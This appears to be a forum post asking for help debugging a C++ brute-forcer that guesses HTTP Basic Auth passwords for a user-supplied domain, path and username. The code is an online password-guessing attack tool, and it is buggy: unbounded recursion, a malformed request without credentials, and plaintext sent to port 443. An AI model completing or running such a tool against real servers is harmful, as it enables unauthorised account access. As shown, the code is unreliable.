I've been coding this brute-forcer for a while and asking a ton of HTTP questions, but when I ran my code inside Visual Studio, I got a stack overflow and also I wasn't able to send and receive data correctly from the server.
Here is my code.
const char characters[64] = {
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',
'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b',
'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n','o', 'p',
'q', 'r', 's', 't', 'u','v', 'w', 'x', 'y', 'z', '0', '1', '2', '3',
'4', '5', '6', '7', '8', '9', '+', '/'
};
BF::BF()
{
_user = "";
_domainName = "";
_path = "";
}
BF::~BF()
{
}
void BF::run() {
getInfo();
initSystem();
crack();
}
void BF::getInfo() {
std::ifstream domFile;
std::string res;
std::string line;
std::cout << "Enter the domain name in the inputDomain file, and once complete enter y to continue: ";
std::getline(std::cin, res);
if (res == "y") {
domFile.open("inputDomain.txt");
if (domFile.is_open()) {
if (std::getline(domFile, line)) {
std::cout << "Got domain name." << std::endl;
if (line == "") {
getInfo();
}
}
domFile.close();
}
}
else {
std::cout << "You entered an invalid value." << std::endl;
system("PAUSE");
}
_domainName = line;
std::ifstream pathFile;
std::string response;
std::string l;
std::cout << "Enter the path in the inputPath file, and once complete enter y to continue: ";
std::getline(std::cin, response);
if (response == "y") {
pathFile.open("inputPath.txt");
if (pathFile.is_open()) {
if (std::getline(pathFile, l)) {
std::cout << "Got path." << std::endl;
if (l == "") {
getInfo();
}
}
pathFile.close();
}
}
else {
std::cout << "You entered an invalid value." << std::endl;
system("PAUSE");
}
_path = l;
std::string u;
std::cout << "Enter the username: ";
std::getline(std::cin, u);
_user = u;
}
void BF::initSystem() {
WSAData wsa;
char* hostname = _strdup(_domainName.c_str());
char ip[100];
struct hostent *he;
struct in_addr **addr_list;
struct sockaddr_in server;
if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
printf("Failed. Error Code: %d", WSAGetLastError());
system("PAUSE");
}
if ((he = gethostbyname(hostname)) == NULL) {
printf("Failed. Error Code: %d", WSAGetLastError());
system("PAUSE");
}
addr_list = (struct in_addr **) he->h_addr_list;
for (int i = 0; addr_list[i] != NULL; i++) {
strcpy_s(ip, inet_ntoa(*addr_list[i]));
}
soc = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
server.sin_addr.s_addr = inet_addr(ip);
server.sin_family = AF_INET;
server.sin_port = htons(443);
if (connect(soc, (struct sockaddr*) &server, sizeof(server)) < 0) {
printf("Failed. Error Code: %d", WSAGetLastError());
system("PAUSE");
}
crackPassword();
}
void BF::crackPassword() {
while (1) {
static unsigned int stringLength = 1;
generatePassword(stringLength, "");
stringLength++;
}
}
void BF::generatePassword(unsigned int length, std::string p) {
if (length == 0) {
std::cout << "Trying: " + p << std::endl;
getDataEncoded(p);
}
for (int i = 0; i < 64; i++) {
std::string a = p + characters[i];
generatePassword(length - 1, a);
}
}
void BF::getDataEncoded(std::string pass) {
Base64 base;
std::string m = _user + ":" + pass;
std::string encoded = base.base64_encode(reinterpret_cast<const unsigned char*>(m.c_str()), m.length());
sendDataToServer(encoded);
}
void BF::sendDataToServer(std::string encodedString) {
char* message, server_reply[2000];
int recv_size;
std::string uri = _domainName + _path;
std::string m = uri + " HTTP/1.1" + _domainName + "Basic " + encodedString;
unsigned int messSize = (unsigned int)m.length();
std::ostringstream ostr;
ostr << messSize;
std::string messageSize = ostr.str();
std::string mes = "GET " + uri + " HTTP/1.1" + "\r\n" +
"Host: " + _domainName + "\r\n" +
"Content-Length: " + messageSize + "\r\n";
message = _strdup(mes.c_str());
if (send(soc, message, strlen(message), 0) < 0) {
std::cout << "Message failed to send." << std::endl;
system("PAUSE");
WSACleanup();
closesocket(soc);
}
std::cout << "Message was sent" << std::endl;
if ((recv_size = recv(soc, server_reply, 2000, 0)) == SOCKET_ERROR) {
printf("Failed. Error Code %d", WSAGetLastError());
system("PAUSE");
WSACleanup();
closesocket(soc);
}
std::cout << "Received the message from the server" << std::endl;
server_reply[recv_size] = '\0';
std::cout << server_reply << std::endl;
system("PAUSE");
}